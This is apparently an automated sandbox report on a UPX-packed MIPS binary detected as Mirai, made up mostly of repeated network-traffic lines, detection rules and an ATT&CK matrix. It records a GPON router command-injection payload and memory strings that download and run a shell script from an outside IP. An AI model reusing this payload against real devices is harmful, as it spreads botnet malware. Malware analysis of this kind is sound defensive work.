    Source: unknownNetwork traffic detected: HTTP traffic on port 38466 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 38384 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36280
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39550
    Source: unknownNetwork traffic detected: HTTP traffic on port 57870 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49594
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38460
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52982
    Source: unknownNetwork traffic detected: HTTP traffic on port 55370 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48260
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38464
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38466
    Source: unknownNetwork traffic detected: HTTP traffic on port 34352 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 34038 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 54662 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 43130 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52234
    Source: unknownNetwork traffic detected: HTTP traffic on port 42470 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52232
    Source: unknownNetwork traffic detected: HTTP traffic on port 44032 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 48818 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51146
    Source: unknownNetwork traffic detected: HTTP traffic on port 53552 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56348 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 54522 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 34642 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56726 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 39380 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 35234 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57822 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37070
    Source: unknownNetwork traffic detected: HTTP traffic on port 35154 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57938
    Source: unknownNetwork traffic detected: HTTP traffic on port 46386 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51154
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54662
    Source: unknownNetwork traffic detected: HTTP traffic on port 33832 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 36274 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 41052 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41568
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43740
    Source: unknownNetwork traffic detected: HTTP traffic on port 52856 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 36664 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37062
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49284
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56852
    Source: unknownNetwork traffic detected: HTTP traffic on port 46192 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 34826 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43738
    Source: unknownNetwork traffic detected: HTTP traffic on port 42482 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56852 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 60740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58806
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38384
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37298
    Source: unknownNetwork traffic detected: HTTP traffic on port 46042 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54206
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39238
    Source: unknownNetwork traffic detected: HTTP traffic on port 50996 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55782
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41548
    Source: unknownNetwork traffic detected: HTTP traffic on port 34116 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 35900 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41544
    Source: unknownNetwork traffic detected: HTTP traffic on port 34676 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42470
    Source: unknownNetwork traffic detected: HTTP traffic on port 54578 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33516
    Source: unknownNetwork traffic detected: HTTP traffic on port 47770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 44744 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46828
    Source: unknownNetwork traffic detected: HTTP traffic on port 39550 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 48362 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50662 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 37016 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55716
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40040
    Source: unknownNetwork traffic detected: HTTP traffic on port 50952 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33746
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53772
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 32898
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54622
    Source: unknownNetwork traffic detected: HTTP traffic on port 44492 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 59314 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59088
    Source: unknownNetwork traffic detected: HTTP traffic on port 39584 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 39148 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43780
    Source: unknownNetwork traffic detected: HTTP traffic on port 33900 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34826
    Source: unknownNetwork traffic detected: HTTP traffic on port 58768 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44624
    Source: unknownNetwork traffic detected: HTTP traffic on port 33548 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45950
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38180
    Source: unknownNetwork traffic detected: HTTP traffic on port 35966 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 36640 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57570 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 33200 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54884
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53794
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53552
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35900
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50288
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54646
    Source: unknownNetwork traffic detected: HTTP traffic on port 51154 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52472
    Source: unknownNetwork traffic detected: HTTP traffic on port 51578 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42434
    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45940
    Source: unknownNetwork traffic detected: HTTP traffic on port 52858 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41184
    Source: unknownNetwork traffic detected: HTTP traffic on port 51522 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 34674 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 55426 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 55564 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 51006 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33798
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57764
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35974
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33796
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34642
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33320
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55110
    Source: unknownNetwork traffic detected: HTTP traffic on port 56110 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 33360 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44206
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47714
    Source: unknownNetwork traffic detected: HTTP traffic on port 42742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46622
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44682
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44684
    Source: unknownNetwork traffic detected: HTTP traffic on port 34262 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33548
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35966
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56444
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56202
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33786
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33784
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35970
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52092
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52098
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54274
    Source: unknownNetwork traffic detected: HTTP traffic on port 54100 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47944
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47700
    Source: unknownNetwork traffic detected: HTTP traffic on port 60470 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 37298 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 44624 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 35090 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33538
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57552
    Source: unknownNetwork traffic detected: HTTP traffic on port 53984 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55370
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54044
    Source: unknownNetwork traffic detected: HTTP traffic on port 55844 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 48236 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40066
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42482
    Source: unknownNetwork traffic detected: HTTP traffic on port 32790 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50926
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35940
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59984
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45508
    Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 43740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52166 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44658
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60720
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44492
    Source: unknownNetwork traffic detected: HTTP traffic on port 34148 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52276
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58810
    Source: unknownNetwork traffic detected: HTTP traffic on port 44074 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 44658 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33360
    Source: unknownNetwork traffic detected: HTTP traffic on port 54122 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 44042 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43394
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45572
    Source: unknownNetwork traffic detected: HTTP traffic on port 44508 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 53458 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 45064 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58468 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 38708 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36620
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34676
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33352
    Source: unknownNetwork traffic detected: HTTP traffic on port 51530 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52982 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45566
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46656
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43388
    Source: unknownNetwork traffic detected: HTTP traffic on port 35940 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 51146 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 43218 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 35858 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 45508 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 38438 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43386
    Source: unknownNetwork traffic detected: HTTP traffic on port 37554 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 46228 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 35566 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 44460 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55564
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57742
    Source: unknownNetwork traffic detected: HTTP traffic on port 55260 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 38576 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56656
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34674
    Source: unknownNetwork traffic detected: HTTP traffic on port 43064 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37934
    Source: unknownNetwork traffic detected: HTTP traffic on port 60050 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 55716 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45318
    Source: unknownNetwork traffic detected: HTTP traffic on port 40066 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56038 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43130
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44460
    Source: unknownNetwork traffic detected: HTTP traffic on port 34126 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58846
    Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 44206 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 55110 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 36996 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 38296 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35984
    Source: unknownNetwork traffic detected: HTTP traffic on port 36708 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34660
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48818
    Source: unknownNetwork traffic detected: HTTP traffic on port 60342 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47966
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
    Source: unknownNetwork traffic detected: HTTP traffic on port 36280 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 42922 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43080
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34126
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57254
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57494
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39818
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58580
    Source: unknownNetwork traffic detected: HTTP traffic on port 38506 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56160
    Source: unknownNetwork traffic detected: HTTP traffic on port 51674 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37872
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34116
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50860
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55086
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60664
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38712
    Source: unknownNetwork traffic detected: HTTP traffic on port 34660 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 41264 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 36486 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34364
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59200
    Source: unknownNetwork traffic detected: HTTP traffic on port 55086 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 38862 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48996
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43064
    Source: unknownNetwork traffic detected: HTTP traffic on port 54884 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 47086 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45002
    Source: unknownNetwork traffic detected: HTTP traffic on port 48652 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45240
    Source: unknownNetwork traffic detected: HTTP traffic on port 38448 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36772
    Source: unknownTCP traffic detected without corresponding DNS query: 181.178.147.0
    Source: unknownTCP traffic detected without corresponding DNS query: 181.205.125.52
    Source: unknownTCP traffic detected without corresponding DNS query: 181.156.172.2
    Source: unknownTCP traffic detected without corresponding DNS query: 181.255.190.113
    Source: unknownTCP traffic detected without corresponding DNS query: 181.163.174.61
    Source: unknownTCP traffic detected without corresponding DNS query: 181.254.168.183
    Source: unknownTCP traffic detected without corresponding DNS query: 181.148.173.172
    Source: unknownTCP traffic detected without corresponding DNS query: 181.89.223.188
    Source: unknownTCP traffic detected without corresponding DNS query: 181.141.144.41
    Source: unknownTCP traffic detected without corresponding DNS query: 181.96.172.0
    Source: unknownTCP traffic detected without corresponding DNS query: 181.251.58.0
    Source: unknownTCP traffic detected without corresponding DNS query: 181.33.125.171
    Source: unknownTCP traffic detected without corresponding DNS query: 181.143.111.171
    Source: unknownTCP traffic detected without corresponding DNS query: 181.197.45.65
    Source: unknownTCP traffic detected without corresponding DNS query: 181.236.212.125
    Source: unknownTCP traffic detected without corresponding DNS query: 181.25.57.187
    Source: unknownTCP traffic detected without corresponding DNS query: 181.103.196.92
    Source: unknownTCP traffic detected without corresponding DNS query: 181.21.133.4
    Source: unknownTCP traffic detected without corresponding DNS query: 181.148.130.152
    Source: unknownTCP traffic detected without corresponding DNS query: 181.22.19.236
    Source: unknownTCP traffic detected without corresponding DNS query: 181.12.15.136
    Source: unknownTCP traffic detected without corresponding DNS query: 181.161.43.147
    Source: unknownTCP traffic detected without corresponding DNS query: 181.53.140.87
    Source: unknownTCP traffic detected without corresponding DNS query: 181.66.29.144
    Source: unknownTCP traffic detected without corresponding DNS query: 181.189.178.42
    Source: unknownTCP traffic detected without corresponding DNS query: 181.143.238.153
    Source: unknownTCP traffic detected without corresponding DNS query: 181.92.243.77
    Source: unknownTCP traffic detected without corresponding DNS query: 181.183.30.87
    Source: unknownTCP traffic detected without corresponding DNS query: 181.160.164.243
    Source: unknownTCP traffic detected without corresponding DNS query: 181.168.28.199
    Source: unknownTCP traffic detected without corresponding DNS query: 181.192.243.15
    Source: unknownTCP traffic detected without corresponding DNS query: 181.130.29.138
    Source: unknownTCP traffic detected without corresponding DNS query: 181.191.149.250
    Source: unknownTCP traffic detected without corresponding DNS query: 181.0.115.52
    Source: unknownTCP traffic detected without corresponding DNS query: 181.90.100.173
    Source: unknownTCP traffic detected without corresponding DNS query: 181.148.91.131
    Source: unknownTCP traffic detected without corresponding DNS query: 181.160.143.15
    Source: unknownTCP traffic detected without corresponding DNS query: 181.62.48.89
    Source: unknownTCP traffic detected without corresponding DNS query: 181.80.169.52
    Source: unknownTCP traffic detected without corresponding DNS query: 181.218.203.87
    Source: unknownTCP traffic detected without corresponding DNS query: 181.116.22.207
    Source: unknownTCP traffic detected without corresponding DNS query: 181.248.47.247
    Source: unknownTCP traffic detected without corresponding DNS query: 181.80.198.14
    Source: unknownTCP traffic detected without corresponding DNS query: 181.182.59.161
    Source: unknownTCP traffic detected without corresponding DNS query: 181.71.186.183
    Source: unknownTCP traffic detected without corresponding DNS query: 181.30.59.60
    Source: unknownTCP traffic detected without corresponding DNS query: 181.49.84.234
    Source: unknownTCP traffic detected without corresponding DNS query: 181.32.146.106
    Source: unknownTCP traffic detected without corresponding DNS query: 181.209.246.30
    Source: unknownTCP traffic detected without corresponding DNS query: 181.36.226.174
    Source: HCyigyiCAH, 5287.1.00000000750bc847.00000000b3b30f16.r-x.sdmpString found in binary or memory: http://104.244.72.185/bins/Rakitin.mips%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=10392301
    Source: HCyigyiCAH, 5287.1.00000000750bc847.00000000b3b30f16.r-x.sdmpString found in binary or memory: http://104.244.72.185/bins/Rakitin.sh
    Source: HCyigyiCAHString found in binary or memory: http://upx.sf.net
    Source: unknownHTTP traffic detected: POST /GponForm/diag_Form?style/ HTTP/1.1User-Agent: Hello, WorldAccept: */*Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 34 2e 32 34 34 2e 37 32 2e 31 38 35 2f 62 69 6e 73 2f 52 61 6b 69 74 69 6e 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://104.244.72.185/bins/Rakitin.sh+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0
    Source: LOAD without section mappingsProgram segment: 0x100000
    Source: HCyigyiCAH, type: SAMPLEMatched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, reference = Internal Research, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4
    Source: classification engineClassification label: mal72.troj.evad.lin@0/0@0/0
    Source: HCyigyiCAHJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link

    Data Obfuscation:

    barindex
    Sample is packed with UPXShow sources
    Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
    Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
    Source: initial sampleString containing UPX found: $Id: UPX 3.94 Copyright (C) 1996-2017 the UPX Team. All Rights Reserved. $

    Hooking and other Techniques for Hiding and Protection:

    barindex
    Uses known network protocols on non-standard portsShow sources
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48002
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48030
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48034
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 47980
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48066
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48068
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48070
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48046
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48074
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48078
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48082
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48080
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48090
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48092
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48098
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48100
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48088
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48120
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48152
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 45110
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 45112
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 45132
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 45132
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 45140
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 45160
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 45168
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 45170
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 45174
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 45194
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 45210
    Source: /tmp/HCyigyiCAH (PID: 5287)Queries kernel information via 'uname':
    Source: HCyigyiCAH, 5287.1.000000009f971e6a.0000000014ba5497.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-mips/tmp/HCyigyiCAHSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/HCyigyiCAH
    Source: HCyigyiCAH, 5287.1.0000000096cd3abf.00000000313fed4c.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mips
    Source: HCyigyiCAH, 5287.1.000000009f971e6a.0000000014ba5497.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips
    Source: HCyigyiCAH, 5287.1.0000000096cd3abf.00000000313fed4c.rw-.sdmpBinary or memory string: V!/etc/qemu-binfmt/mips

    Stealing of Sensitive Information:

    barindex
    Yara detected MiraiShow sources
    Source: Yara matchFile source: dump.pcap, type: PCAP

    Remote Access Functionality:

    barindex
    Yara detected MiraiShow sources
    Source: Yara matchFile source: dump.pcap, type: PCAP

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionObfuscated Files or Information1OS Credential DumpingSecurity Software Discovery11Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud

    Malware Configuration

    No configs have been found

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Number of created Files
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    HCyigyiCAH20%VirustotalBrowse
